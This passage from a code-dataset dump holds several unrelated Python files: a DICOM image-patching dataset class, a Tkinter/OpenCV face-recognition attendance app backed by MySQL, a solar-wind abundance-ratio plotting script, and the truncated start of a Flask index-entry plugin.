getPatch(self,img_id):\n        # reflect-pad the image by 256 px on every side, then cut 256x256 tiles on a 64 px stride\n        mod = 256\n        count=0\n        X_test = np.zeros((256, self.dims, self.dims), dtype=np.float32)\n\n        img = pydicom.dcmread(self.df.iloc[img_id]['file_path']).pixel_array\n        topBorderWidth = mod\n        bottomBorderWidth = mod\n        leftBorderWidth = mod\n        rightBorderWidth= mod\n\n        img = cv2.copyMakeBorder(\n            img,\n            topBorderWidth,\n            bottomBorderWidth,\n            leftBorderWidth,\n            rightBorderWidth,\n            cv2.BORDER_REFLECT\n        )\n\n# image(img)\n\n        for i in range(256, 1280,64):\n            for j in range( 256,1280,64):\n                # print(i,j)\n                X_test[count] = img[i-128:i+128, j-128:j+128]\n                count+=1\n\n# print('dataset size: ', count)\n        X_test /=255\n# t=rebuild_(X_test)\n# image(t)\n        return X_test\n\n    def __len__(self):\n        return len(self.df)\n\n    def __getitem__(self, idx):\n        #should return 256 patches\n        images = self.getPatch(idx)\n        return images\n","sub_path":"utils/pneumonia_patches.py","file_name":"pneumonia_patches.py","file_ext":"py","file_size_in_byte":8479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"69820096","text":"from tkinter import*\r\nfrom tkinter import ttk\r\nimport tkinter\r\nfrom PIL import Image,ImageTk\r\nfrom time import strftime\r\nfrom datetime import datetime\r\nimport os\r\nimport cv2\r\nimport mysql.connector\r\nfrom tkinter import messagebox\r\nfrom students import Students\r\nfrom train import Train\r\nfrom face_recognizer import Face_recognizer\r\nfrom attendance import Attendance\r\nfrom chatbot import Chatbot\r\n\r\nclass Face_Recognition_System_student:\r\n def __init__(self,root):\r\n self.root=root\r\n self.root.geometry(\"1365x755+0+0\")\r\n self.root.title(\"Face Recognition System\")\r\n\r\n # Image 1\r\n img=Image.open(r\"college_images\\facialrecognition.png\")\r\n img=img.resize((455,130),Image.ANTIALIAS)\r\n self.photoimg=ImageTk.PhotoImage(img)\r\n\r\n f_lbl=Label(self.root,image=self.photoimg)\r\n f_lbl.place(x=0,y=0,width=455,height=130)\r\n\r\n #image2\r\n img1=Image.open(r\"college_images\\images.jpg\")\r\n img1=img1.resize((455,130),Image.ANTIALIAS)\r\n self.photoimg1=ImageTk.PhotoImage(img1)\r\n\r\n f_lbl=Label(self.root,image=self.photoimg1)\r\n f_lbl.place(x=455,y=0,width=455,height=130)\r\n\r\n #image3\r\n img2=Image.open(r\"college_images\\dev.jpg\")\r\n img2=img2.resize((457,130),Image.ANTIALIAS)\r\n self.photoimg2=ImageTk.PhotoImage(img2)\r\n\r\n f_lbl=Label(self.root,image=self.photoimg2)\r\n f_lbl.place(x=910,y=0,width=457,height=130)\r\n\r\n #Background Image\r\n img3=Image.open(r\"college_images\\BestFacialRecognition.jpg\")\r\n img3=img3.resize((1365,625),Image.ANTIALIAS)\r\n self.photoimg3=ImageTk.PhotoImage(img3)\r\n\r\n bg_img=Label(self.root,image=self.photoimg3)\r\n bg_img.place(x=0,y=130,width=1365,height=625)\r\n\r\n #Title\r\n title_lbl=Label(bg_img, text=\"FACE RECOGNITION ATTENDANCE SYSTEM SOFTWARE\", font=(\"times new roman\",28,\"bold\"),bg=\"white\",fg=\"red\")\r\n title_lbl.place(x=0,y=0,width=1365,height=45)\r\n\r\n #Time\r\n def time():\r\n string=strftime(\"%H:%M:%S %p\")\r\n lbl.config(text = string)\r\n lbl.after(1000, time)\r\n \r\n lbl=Label(title_lbl,font=(\"times new roman\",14),bg=\"white\",fg=\"blue\")\r\n lbl.place(x=5,y=0,width=120,height=50)\r\n time()\r\n\r\n # #Students button\r\n # img4=Image.open(r\"college_images\\student.jpg\")\r\n # img4=img4.resize((180,180),Image.ANTIALIAS)\r\n # self.photoimg4=ImageTk.PhotoImage(img4)\r\n\r\n # b1=Button(bg_img,image=self.photoimg4,command=self.student_detail,cursor=\"hand2\")\r\n # b1.place(x=200,y=100,width=180, height=180)\r\n\r\n # b1_1=Button(bg_img,text=\"Student Details\",command=self.student_detail,cursor=\"hand2\",font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n # b1_1.place(x=200,y=280,width=180,height=30)\r\n\r\n #Detect face button\r\n img5=Image.open(r\"college_images\\face_detector1.jpg\")\r\n img5=img5.resize((180,180),Image.ANTIALIAS)\r\n self.photoimg5=ImageTk.PhotoImage(img5)\r\n\r\n b2=Button(bg_img,image=self.photoimg5,cursor=\"hand2\",command=self.face_recog)\r\n b2.place(x=200,y=100,width=180, height=180)\r\n\r\n b2_2=Button(bg_img,text=\"Face Detector\",cursor=\"hand2\",command=self.face_recog,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n b2_2.place(x=200,y=280,width=180,height=30)\r\n\r\n\r\n #Attendance face button\r\n img6=Image.open(r\"college_images\\girl.jpeg\")\r\n img6=img6.resize((180,180),Image.ANTIALIAS)\r\n self.photoimg6=ImageTk.PhotoImage(img6)\r\n\r\n b3=Button(bg_img,image=self.photoimg6,cursor=\"hand2\",command=self.attend)\r\n b3.place(x=450,y=100,width=180, 
height=180)\r\n\r\n b3_3=Button(bg_img,text=\"Attendance\",cursor=\"hand2\",command=self.attend,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n b3_3.place(x=450,y=280,width=180,height=30)\r\n\r\n\r\n #Help button\r\n img7=Image.open(r\"college_images\\NyftyBot_small_512x512.webp\")\r\n img7=img7.resize((180,180),Image.ANTIALIAS)\r\n self.photoimg7=ImageTk.PhotoImage(img7)\r\n\r\n b4=Button(bg_img,image=self.photoimg7,cursor=\"hand2\",command=self.chat_box)\r\n b4.place(x=700,y=100,width=180, height=180)\r\n\r\n b4_4=Button(bg_img,text=\"Help Desk\",cursor=\"hand2\",command=self.chat_box,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n b4_4.place(x=700,y=280,width=180,height=30)\r\n\r\n # #Train Face button\r\n # img8=Image.open(r\"college_images\\images.jpg\")\r\n # img8=img8.resize((180,180),Image.ANTIALIAS)\r\n # self.photoimg8=ImageTk.PhotoImage(img8)\r\n\r\n # b5=Button(bg_img,image=self.photoimg8,cursor=\"hand2\",command=self.train_data)\r\n # b5.place(x=200,y=350,width=180, height=180)\r\n\r\n # b5_5=Button(bg_img,text=\"Train Data Model\",cursor=\"hand2\",command=self.train_data,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n # b5_5.place(x=200,y=530,width=180,height=30)\r\n\r\n # #Photos button\r\n # img9=Image.open(r\"college_images\\clg.jpg\")\r\n # img9=img9.resize((180,180),Image.ANTIALIAS)\r\n # self.photoimg9=ImageTk.PhotoImage(img9)\r\n\r\n # b6=Button(bg_img,image=self.photoimg9,cursor=\"hand2\",command=self.open_images)\r\n # b6.place(x=200,y=350,width=180, height=180)\r\n\r\n # b6_6=Button(bg_img,text=\"Photos\",cursor=\"hand2\",command=self.open_images,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n # b6_6.place(x=200,y=530,width=180,height=30)\r\n\r\n\r\n #Dev page button\r\n # img10=Image.open(r\"college_images\\dev.jpg\")\r\n # img10=img10.resize((180,180),Image.ANTIALIAS)\r\n # self.photoimg10=ImageTk.PhotoImage(img10)\r\n\r\n # b7=Button(bg_img,image=self.photoimg10,cursor=\"hand2\")\r\n # b7.place(x=950,y=100,width=180, height=180)\r\n\r\n # b7_7=Button(bg_img,text=\"Developers\",cursor=\"hand2\",font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n # b7_7.place(x=950,y=280,width=180,height=30)\r\n\r\n #Exit button\r\n img11=Image.open(r\"college_images\\exit.jpg\")\r\n img11=img11.resize((180,180),Image.ANTIALIAS)\r\n self.photoimg11=ImageTk.PhotoImage(img11)\r\n\r\n b8=Button(bg_img,image=self.photoimg11,cursor=\"hand2\",command=self.iexit)\r\n b8.place(x=200,y=350,width=180, height=180)\r\n\r\n b8_8=Button(bg_img,text=\"Exit\",cursor=\"hand2\",command=self.iexit,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n b8_8.place(x=200,y=530,width=180,height=30)\r\n\r\n\r\n def mark_attendance(self,i,r,n,d):\r\n with open(\"attendance.csv\",\"r+\",newline=\"\\n\") as f:\r\n myDatalist=f.readlines()\r\n name_List=[]\r\n for line in myDatalist:\r\n entry=line.split((\",\"))\r\n name_List.append(entry[0])\r\n if ((i not in name_List) and (r not in name_List) and (n not in name_List) and (d not in name_List)):\r\n now=datetime.now()\r\n d1=now.strftime(\"%d/%m/%Y\")\r\n dtString=now.strftime(\"%H:%M:%S\")\r\n f.writelines(f\"\\n{i},{r},{n},{d},{dtString},{d1},Present\")\r\n\r\n \r\n\r\n\r\n\r\n #=================Face Recogniton===============\r\n def face_recog(self):\r\n def draw_boundary(img,classifier,ScaleFactor,minNeighbour,color,text,clf):\r\n gray_image=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n 
features=classifier.detectMultiScale(gray_image,ScaleFactor,minNeighbour)\r\n\r\n coord=[]\r\n\r\n for (x,y,w,h) in features:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)\r\n id,predict=clf.predict(gray_image[y:y+h,x:x+w])\r\n confidence=int((100*(1-predict/300)))\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"\",database=\"face_recognition\")\r\n my_cursor=conn.cursor()\r\n\r\n my_cursor.execute(\"select name from students where st_id=\"+str(id))\r\n n=my_cursor.fetchone()\r\n n=\"+\".join(n)\r\n\r\n my_cursor.execute(\"select roll from students where st_id=\"+str(id))\r\n r=my_cursor.fetchone()\r\n r=\"+\".join(r)\r\n\r\n my_cursor.execute(\"select Dep from students where st_id=\"+str(id))\r\n d=my_cursor.fetchone()\r\n d=\"+\".join(d)\r\n\r\n my_cursor.execute(\"select st_id from students where st_id=\"+str(id))\r\n i=my_cursor.fetchone()\r\n i=\"+\".join(i)\r\n\r\n\r\n\r\n if confidence>77:\r\n cv2.putText(img,f\"Student's ID:{i}\",(x,y-80),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,255,0),2)\r\n cv2.putText(img,f\"Roll. No.:{r}\",(x,y-55),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,255,0),2)\r\n cv2.putText(img,f\"Name:{n}\",(x,y-30),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,255,0),2)\r\n cv2.putText(img,f\"Department:{d}\",(x,y-5),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,255,0),2)\r\n self.mark_attendance(i,r,n,d)\r\n else:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),2)\r\n cv2.putText(img,\"Unknown Face\",(x,y-55),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,0,255),2)\r\n\r\n coord=[x,y,w,h]\r\n return coord\r\n \r\n def recognize(img,clf,faceCascade):\r\n coord=draw_boundary(img,faceCascade,1.1,10,(255,255,255),\"Face\",clf)\r\n return img\r\n \r\n faceCascade=cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n clf=cv2.face.LBPHFaceRecognizer_create()\r\n clf.read(\"classifier.xml\")\r\n\r\n\r\n video_cap=cv2.VideoCapture(0)\r\n\r\n while True:\r\n ret,img=video_cap.read()\r\n img=recognize(img,clf,faceCascade)\r\n cv2.imshow(\"Welcome to face recognizer\",img)\r\n\r\n if cv2.waitKey(1)==13:\r\n break\r\n video_cap.release()\r\n cv2.destroyAllWindows()\r\n\r\n #exit\r\n def iexit(self):\r\n self.iexit=tkinter.messagebox.askyesno(\"Exit\",\"Are you sure you want exit?\",parent=self.root)\r\n if self.iexit > 0:\r\n self.root.destroy()\r\n else:\r\n return\r\n\r\n #Open images\r\n def open_images(self):\r\n os.startfile(\"data\")\r\n\r\n\r\n #Function Buttons\r\n def student_detail(self):\r\n self.new_window=Toplevel(self.root)\r\n self.app=Students(self.new_window)\r\n\r\n # def train_data(self):\r\n # self.new_window=Toplevel(self.root)\r\n # self.app=Train(self.new_window)\r\n\r\n # def face_detect(self):\r\n # self.new_window=Toplevel(self.root)\r\n # self.app=Face_recognizer(self.new_window)\r\n\r\n def attend(self):\r\n self.new_window=Toplevel(self.root)\r\n self.app=Attendance(self.new_window)\r\n\r\n def chat_box(self):\r\n self.new_window=Toplevel(self.root)\r\n self.app=Chatbot(self.new_window)\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ ==\"__main__\":\r\n root=Tk()\r\n obj=Face_Recognition_System_student(root)\r\n root.mainloop()","sub_path":"student_main.py","file_name":"student_main.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49600224","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 12 10:56:03 2018\n\n@author: aa245567\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 13 20:48:25 2017\n\n@author: 
andy\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport plottingRoutines as pR\n\n\n\n#import all that stuff you need:\nfl_v = np.load('/Users/aa245567/Desktop/pythonstuff/hfl_v.npy')\nf_vdist = np.load('/Users/aa245567/Desktop/pythonstuff/hf_vdist.npy')\npath = '/Users/aa245567/Desktop/pythonstuff/'\nabundn = np.load(path + 'abund_struct.npy')\nregime = np.load(path + 'regime_struct.npy')\naswix1d = np.load(path + 'aswix_1d.npy')\n\n\n#plot the differential fluences for each regime,\n#\n\njvel = np.arange(200,1825,25) #Define jvel because it is convenient to do so here.\n'''\nfig, (pr_fl) = plt.subplots()\nline1 = pr_fl.plot(jvel,fl_v[:65,0,0],'r',label= \"CME\")\nline2 = pr_fl.plot(jvel,fl_v[:65,0,1],'b',label=\"CH\")\nline3 = pr_fl.plot(jvel,fl_v[:65,0,2],'g',label=\"IS\")\nline4 = pr_fl.plot(jvel,fl_v[:65,0,3],color='black',label=\"Bulk\")\npr_fl.set_ylabel(r\"Proton Fluence ${ cm^{-2}}$\",fontsize='large')\npr_fl.set_xlabel(r\"Proton Speed (${ km s^{-1}}$)\",fontsize='large')\npr_fl.legend(loc=\"upper right\")\n\n\n#plot the o7+/o6+ abundance ratios\n\nfor i in range(4):\n fig, (snax) = plt.subplots()\n aline1 = snax.plot(np.arange(200,1825,25),fl_v[0:65,0,i],'r',label = 'He')\n aline2 = snax.plot(np.arange(200,1825,25),fl_v[:65,1,i],'b-',label = 'C')\n aline3 = snax.plot(np.arange(200,1825,25),fl_v[:65,2,i],color='gold',label = '')\n aline4 = snax.plot(np.arange(200,1825,25),fl_v[:65,3,i],color='skyblue',label = 'N')\n aline5 = snax.plot(np.arange(200,1825,25),fl_v[:65,4,i],color='green',label='O')\n aline6 = snax.plot(np.arange(200,1825,25),fl_v[:65,5,i],color='purple',label='He')\n aline7 = snax.plot(np.arange(200,1825,25),fl_v[:65,6,i],color='lawngreen',label='Mg')\n aline8 = snax.plot(np.arange(200,1825,25),fl_v[:65,7,i],color='pink',label='S')\n snax.set_yscale('log')\n snax.set_ylabel('Normalized Fluence (arbitrary units)',fontsize='large')\n snax.set_xlabel(r'Solar Wind Proton Speed (km${ s^{ -1}}$)',fontsize = 'large')\n \n snax.legend()\n print fig \n ''' \n#Sorting routines and things.\n\n\n\n#assigns values to lists corresponding to speed bins before plotting.\ndlimit = 8\n\nhe2olow2, he2oupp2, he2omed2,hespeed2 = pR.geoHistWRanges(2,'he2o',dlimit,'Oxygen')\nc2olow2,c2oupp2,c2omed2,cspeed2=pR.geoHistWRanges(2,'c2o',dlimit,'Oxygen')\nn2olow2,n2oupp2,n2omed2,nspeed2=pR.geoHistWRanges(2,'n2o',dlimit,'Oxygen')\nne2olow2,ne2oupp2,ne2omed2,nespeed2=pR.geoHistWRanges(2,'ne2o',dlimit,'Oxygen')\nmg2olow2,mg2oupp2,mg2omed2,mgspeed2=pR.geoHistWRanges(2,'mg2o',dlimit,'Oxygen')\nsi2olow2,si2oupp2,si2omed2,sispeed2=pR.geoHistWRanges(2,'si2o',dlimit,'Oxygen')\ns2olow2,s2oupp2,s2omed2,sspeed2=pR.geoHistWRanges(2,'s2o',dlimit,'Oxygen')\nfe2olow2,fe2oupp2,fe2omed2,fespeed2=pR.geoHistWRanges(2,'fe2o',dlimit,'Oxygen')\no76low2, o76upp2, o76med2,o76speed2=pR.geoHistWRanges(2,'o76',dlimit,'Oxygen')\n\nhe2olow1, he2oupp1, he2omed1,hespeed1 = pR.geoHistWRanges(1,'he2o',dlimit,'Oxygen')\nc2olow1,c2oupp1,c2omed1,cspeed1=pR.geoHistWRanges(1,'c2o',dlimit,'Oxygen')\nn2olow1,n2oupp1,n2omed1,nspeed1=pR.geoHistWRanges(1,'n2o',dlimit,'Oxygen')\nne2olow1,ne2oupp1,ne2omed1,nespeed1=pR.geoHistWRanges(1,'ne2o',dlimit,'Oxygen')\nmg2olow1,mg2oupp1,mg2omed1,mgspeed1=pR.geoHistWRanges(1,'mg2o',dlimit,'Oxygen')\nsi2olow1,si2oupp1,si2omed1,sispeed1=pR.geoHistWRanges(1,'si2o',dlimit,'Oxygen')\ns2olow1,s2oupp1,s2omed1,sspeed1=pR.geoHistWRanges(1,'s2o',dlimit,'Oxygen')\nfe2olow1,fe2oupp1,fe2omed1,fespeed1=pR.geoHistWRanges(1,'fe2o',dlimit,'Oxygen')\no76low1, o76upp1, 
o76med1,o76speed1=pR.geoHistWRanges(1,'o76',dlimit,'Oxygen')\n\nhe2olow3, he2oupp3, he2omed3,hespeed3 = pR.geoHistWRanges(3,'he2o',dlimit,'Oxygen')\nc2olow3,c2oupp3,c2omed3,cspeed3=pR.geoHistWRanges(3,'c2o',dlimit,'Oxygen')\nn2olow3,n2oupp3,n2omed3,nspeed3=pR.geoHistWRanges(3,'n2o',dlimit,'Oxygen')\nne2olow3,ne2oupp3,ne2omed3,nespeed3=pR.geoHistWRanges(3,'ne2o',dlimit,'Oxygen')\nmg2olow3,mg2oupp3,mg2omed3,mgspeed3=pR.geoHistWRanges(3,'mg2o',dlimit,'Oxygen')\nsi2olow3,si2oupp3,si2omed3,sispeed3=pR.geoHistWRanges(3,'si2o',dlimit,'Oxygen')\ns2olow3,s2oupp3,s2omed3,sspeed3=pR.geoHistWRanges(3,'s2o',dlimit,'Oxygen')\nfe2olow3,fe2oupp3,fe2omed3,fespeed3=pR.geoHistWRanges(3,'fe2o',dlimit,'Oxygen')\no76low3,o76upp3,o76med3,o76speed3=pR.geoHistWRanges(3,'o76',dlimit,'Oxygen')\n\nhe2olow0, he2oupp0, he2omed0,hespeed0 = pR.geoHistWRanges(0,'he2o',dlimit,'Oxygen')\nc2olow0,c2oupp0,c2omed0,cspeed0=pR.geoHistWRanges(0,'c2o',dlimit,'Oxygen')\nn2olow0,n2oupp0,n2omed0,nspeed0=pR.geoHistWRanges(0,'n2o',dlimit,'Oxygen')\nne2olow0,ne2oupp0,ne2omed0,nespeed0=pR.geoHistWRanges(0,'ne2o',dlimit,'Oxygen')\nmg2olow0,mg2oupp0,mg2omed0,mgspeed0=pR.geoHistWRanges(0,'mg2o',dlimit,'Oxygen')\nsi2olow0,si2oupp0,si2omed0,sispeed0=pR.geoHistWRanges(0,'si2o',dlimit,'Oxygen')\ns2olow0,s2oupp0,s2omed0,sspeed0=pR.geoHistWRanges(0,'s2o',dlimit,'Oxygen')\nfe2olow0,fe2oupp0,fe2omed0,fespeed0=pR.geoHistWRanges(0,'fe2o',dlimit,'Oxygen')\no76low0,o76upp0,o76med0,o76speed0=pR.geoHistWRanges(0,'o76',dlimit,'Oxygen')\n\n#Plots abundance ratios and variances.\n\n#############********************##############\n'''\nnames = ['he2o','c2o','n2o','ne2o','mg2o','si2o','s2o','fe2o']\nspeeds = ['vhe','vc5','vn5','vne8','vmg10','vsi8','vs8','vfe10']\nylblparams = [[1,3,101],[-1,0.3,101],[-2,0,101],[-2,0,101],[-1.5,0,101],[-1.5,0.5,101],\n [-2,0.5,100], [-2,1,101]]\nreglbls = ['IS+CH','CME','CH','IS']\nflagNum = [0,1,2,3]\nymaxparams = [200,1,0.25,0.25,0.5,0.5,0.125,0.5]\nyminparams = [20,0.2,0.03,0.03,0.055,0.05,0.02,0.05]\nfor nm in range(len(names)):#len( names)):\n fig, axs = plt.subplots(2,2,figsize=(15,10))\n axes = np.ravel(axs)\n axind = 0\n for rel in reglbls:\n '''\n # if names[nm] == 'n2o' or names[nm] == 's2o':\n # x,y = findReg(rel,aswix1d[names[nm]],oneDay = 1)\n # x,y = goodBins(x,y)\n \n # else:\n'''\n x,y = pR.findReg(abundn[speeds[nm]],rel,abundn[names[nm]])\n x,y = pR.goodBins(x,y)\n \n xbins = np.linspace(0,851,75)\n ybins = np.logspace(ylblparams[nm][0],ylblparams[nm][1],ylblparams[nm][2])\n px,py = pR.geoMeanOfLog(5,x,y,speed = abundn[speeds[nm]])\n\n fit = np.polyfit(px,py,1,full=False,cov=True)\n slope = fit[0][0]\n intercept = fit[0][1]\n covariance = fit[1]\n bfline = 10**(slope * xbins + intercept)\n counts,_,_ = np.histogram2d(x,y,bins=(xbins,ybins))\n cl = axes[axind].pcolormesh(xbins,ybins,np.transpose(counts),cmap='jet')\n axes[axind].pcolormesh(xbins,ybins,np.transpose(counts),cmap = 'jet')\n axes[axind].set_ylim(ymin=yminparams[nm], ymax=ymaxparams[nm])\n axes[axind].set_title(rel,fontweight='bold')\n axes[axind].set_yscale('log')\n axes[axind].plot(xbins,bfline,'w-')\n axes[axind].text(0.01,0.01,'Slope = %f +/- %f'%(slope,np.sqrt(covariance[-1][-1]))\n ,verticalalignment='bottom',horizontalalignment='left',transform=axes[axind].transAxes,color='white')\n \n axind += 1\n \n fig.text(0.04,0.6,'%s Abundance Ratios'%names[nm].upper(),rotation='vertical',fontsize='large')\n fig.text(0.5,0,'Solar Wind Speed (km/s)',ha='center',va='center',fontsize='large')\n cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])\n 
fig.colorbar(cl,cax=cax)\n\n#################**************************########################\n\n\n#Abundance ratios with 10-90% variances.\n'''\n\nfig, ((ax0,ax1),(ax2,ax3),(ax4,ax5),(ax6,ax7)) = plt.subplots(nrows=4,ncols=2,figsize=(15,10))\nfig.suptitle('Elemental Abundance Ratios',fontsize='large')\nfig.text(0.5,0,'Solar Wind Speed (km/s)',ha='center',va='center',fontsize='large')\nax0.errorbar(hespeed2 + 5, he2omed2, yerr=[he2olow2, he2oupp2], fmt='bo',label=\"Coronal Hole\")\n#ax0.errorbar(hespeed0 + 10,he2omed0[:20],yerr=[he2olow0[:20],he2oupp0[:20]], fmt='ro',label=\"Bulk\")\nax0.errorbar(hespeed1 + 15,he2omed1,yerr=[he2olow1,he2oupp1],fmt='ro',label='CME')\nax0.errorbar(hespeed3 , he2omed3,yerr=[he2olow3,he2oupp3], fmt='go',label=\"Interstream\")\nax0.set_ylabel('He/O',fontweight = 'bold')\nax0.set_yscale('log')\nax0.set_ylim(ymin=30,ymax=300)\n\nax0.legend(numpoints=1,loc=\"lower right\")\n\n\n\nax1.errorbar(cspeed2+5, c2omed2, yerr =[c2olow2, c2oupp2], fmt='bo' )\nax1.errorbar(cspeed1+10,c2omed1,yerr=[c2olow1,c2oupp1], fmt='ro')\nax1.errorbar(cspeed3,c2omed3,yerr=[c2olow3,c2oupp3], fmt='go')\n#ax1.errorbar(jvel[:20],c2omed0[:25],yerr=[c2olow0[:25],c2oupp0[:25]],fmt='yo')\nax1.set_yscale('log')\nax1.yaxis.set_label_position('right')\nax1.set_ylabel('C/O',fontweight='bold')\nax1.set_ylim(ymin=0.25,ymax=2.)\n\n\n\nax2.errorbar(nspeed2+5,n2omed2, yerr=[n2olow2,n2oupp2], fmt='bo')\nax2.errorbar(nspeed1+10,n2omed1,yerr=[n2olow1,n2oupp1], fmt='ro')\nax2.errorbar(nspeed3,n2omed3,yerr=[n2olow3,n2oupp3], fmt='go')\n#ax2.errorbar(jvel[:20],n2omed0[:25],yerr=[n2olow0[:25],n2oupp0[:25]],fmt='yo')\nax2.set_yscale('log')\nax2.set_ylabel('N/O',fontweight='bold')\nax2.set_ylim(ymin=0.075,ymax=0.7)\n\n\n\nax3.errorbar(nespeed2+5,ne2omed2,yerr=[ne2olow2,ne2oupp2],fmt='bo')\nax3.errorbar(nespeed1+10,ne2omed1,yerr=[ne2olow1,ne2oupp1], fmt='ro')\nax3.errorbar(nespeed3,ne2omed3,yerr=[ne2olow3,ne2oupp3], fmt='go')\n#ax3.errorbar(jvel[:20],ne2omed0[:25],yerr=[ne2olow0[:25],ne2oupp0[:25]],fmt='yo')\nax3.set_yscale('log')\nax3.yaxis.set_label_position('right')\nax3.set_ylabel('Ne/O',fontweight='bold')\nax3.set_ylim(ymin=0.06,ymax=0.6)\n\n\n\nax4.errorbar(mgspeed2+5,mg2omed2,yerr=[mg2olow2,mg2oupp2],fmt='bo')\nax4.errorbar(mgspeed1+10,mg2omed1,yerr=[mg2olow1,mg2oupp1], fmt='ro')\nax4.errorbar(mgspeed3,mg2omed3,yerr=[mg2olow3,mg2oupp3], fmt='go')\n#ax4.errorbar(jvel[:20],mg2omed0[:25],yerr=[mg2olow0[:25],mg2oupp0[:25]],fmt='yo')\nax4.set_yscale('log')\nax4.set_ylabel('Mg/O',fontweight='bold')\nax4.set_ylim(ymin=0.05,ymax=0.5)\n\n\n\nax5.errorbar(sispeed2+5,si2omed2,yerr=[si2olow2,si2oupp2],fmt='bo')\nax5.errorbar(sispeed1+10,si2omed1,yerr=[si2olow1,si2oupp1], fmt='ro')\nax5.errorbar(sispeed3,si2omed3,yerr=[si2olow3,si2oupp3], fmt='go')\n#ax5.errorbar(jvel[:20],si2omed0[:25],yerr=[si2olow0[:25],si2oupp0[:25]],fmt='yo')\nax5.set_yscale('log')\nax5.yaxis.set_label_position('right')\nax5.set_ylabel('Si/O',fontweight='bold')\nax5.set_ylim(ymin=0.05,ymax=0.5)\n\n\n\nax6.errorbar(sspeed2+5,s2omed2,yerr=[s2olow2,s2oupp2],fmt='bo')\nax6.errorbar(sspeed1+10,s2omed1,yerr=[s2olow1,s2oupp1], fmt='ro')\nax6.errorbar(sspeed3,s2omed3,yerr=[s2olow3,s2oupp3], fmt='go')\n#ax6.errorbar(jvel[:20],s2omed0[:25],yerr=[s2olow0[:25],s2oupp0[:25]],fmt='yo')\nax6.set_yscale('log')\nax6.set_ylabel('S/O',fontweight='bold')\nax6.set_ylim(ymin=0.025)\n\n\n\nax7.errorbar(fespeed2+5,fe2omed2,yerr=[fe2olow2,fe2oupp2],fmt='bo')\nax7.errorbar(fespeed1+10,fe2omed1,yerr=[fe2olow1,fe2oupp1], 
fmt='ro')\nax7.errorbar(fespeed3,fe2omed3,yerr=[fe2olow3,fe2oupp3], fmt='go')\n#ax7.errorbar(jvel[:20],fe2omed0[:25],yerr=[fe2olow0[:25],fe2oupp0[:25]],fmt='yo')\nax7.set_yscale('log')\nax7.yaxis.set_label_position('right')\nax7.set_ylabel('Fe/O',fontweight='bold')\nax7.set_ylim(ymin=0.07)\n\n\n\nfig, (axo76) = plt.subplots(1,1)\naxo76.errorbar(o76speed2+5,o76med2,yerr=[o76low2,o76upp2],fmt='bo',label = 'Fast wind')\naxo76.errorbar(o76speed1+10,o76med1,yerr=[o76low1,o76upp1],fmt='ro',label = 'CME')\naxo76.errorbar(o76speed3,o76med3,yerr=[o76low3,o76upp3],fmt='go',label = 'Slow Wind')\n#axo76.errorbar(jvel[:20],o76med0[:25],yerr=[o76low0[:25],o76upp0[:25]],fmt='yo',label='other')\naxo76.set_yscale('log')\naxo76.set_xlabel(r'Solar Wind Speed (km/s)',fontweight = \"bold\")\naxo76.set_ylabel(r'${\\bf {O^{\\bf 7+}/O^{\\bf 6+}}}$ Abundance Ratio',fontweight = 'bold')\naxo76.set_ylim(-3,1)\naxo76.legend(numpoints = 1, loc = 'lower left')\n\nplt.show()\n\n","sub_path":"plotting_x2oWgeometricmean_v1.py","file_name":"plotting_x2oWgeometricmean_v1.py","file_ext":"py","file_size_in_byte":11714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"529983355","text":"from collections import defaultdict\nfrom itertools import groupby\n\nfrom flask import current_app, render_template_string, request, abort, redirect, Markup, url_for\nfrom sqlalchemy import Column, ForeignKey, Integer, String\nfrom sqlalchemy.orm import relationship\n\nimport quoted_forsooth.plugins.report_plugin as report_plugin\nfrom quoted_forsooth import db\nfrom quoted_forsooth.db import session_scope\nfrom quoted_forsooth.utils import natural_key\n\nedit_template = \"\"\"\n{% extends \"form_base.html\" %}\n{% block title %}{% if index_entry.id %}Edit{% else %}Add{% endif %} index entry - Quoted Forsooth{% endblock %}\n{% block formContent %}\n
<h1>{% if index_entry.id %}Edit{% else %}Add a new{% endif %} index entry</h1>\n<form method=\"post\" action=\"{{ url_for('plugin.index_entry.edit_post') }}\">\n    {% if index_entry.id %}<input type=\"hidden\" name=\"db_id\" value=\"{{ index_entry.id }}\">{% endif %}\n    <div class=\"form-group\">\n        <label for=\"term\">Term</label>\n        <input type=\"text\" id=\"term\" name=\"term\" value=\"{{ index_entry.term or '' }}\">\n    </div>\n    <div class=\"form-group\">\n        <label for=\"sort_term\">Sort term (optional)</label>\n        <input type=\"text\" id=\"sort_term\" name=\"sort_term\" value=\"{{ index_entry.sort_term or '' }}\">\n    </div>\n    <div class=\"form-group\">\n        <label for=\"location\">Location</label>\n        <input type=\"text\" id=\"location\" name=\"location\" value=\"{{ 